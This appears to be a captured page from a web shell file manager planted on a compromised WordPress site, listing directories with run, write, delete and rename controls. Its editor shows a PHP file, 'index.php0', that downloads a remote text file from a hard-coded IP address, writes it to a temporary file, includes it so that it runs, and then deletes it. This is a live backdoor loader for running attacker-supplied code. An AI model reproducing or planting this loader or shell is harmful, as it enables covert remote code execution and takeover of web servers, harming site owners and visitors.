at path:
ROOT
/
index.php0
run:
R
W
Run
.well-known
DIR
2026-04-20 09:10:36
R
W
Run
0152a
DIR
2026-07-16 07:34:46
R
W
Run
086f98
DIR
2026-08-05 01:41:21
R
W
Run
insurance
DIR
2026-07-16 07:34:46
R
W
Run
safaris
DIR
2026-07-16 07:34:46
R
W
Run
wp-content
DIR
2026-08-05 01:41:21
R
W
Run
wp-includes
DIR
2026-06-15 01:05:22
R
W
Run
.htaccess
1.13 KB
2024-05-18 01:41:21
R
W
Run
buy.php
1.48 KB
2024-09-24 01:41:21
R
W
Run
index.php0
418 By
2024-05-24 01:41:20
R
W
Run
Delete
Rename
robots.txt
403 By
2024-12-04 01:41:21
R
W
Run
error_log
up
📄
index.php0
Save
<?php $f = @tempnam(@sys_get_temp_dir(),""); $handle = curl_init(); curl_setopt ($handle, CURLOPT_URL, 'http://69.30.198.106/z60417_8/stat/index2.txt'); curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5); $result = curl_exec( $handle ); if ( PHP_VERSION_ID < 80000 ) { curl_close( $handle ); } @file_put_contents($f, $result); @include $f; @unlink($f);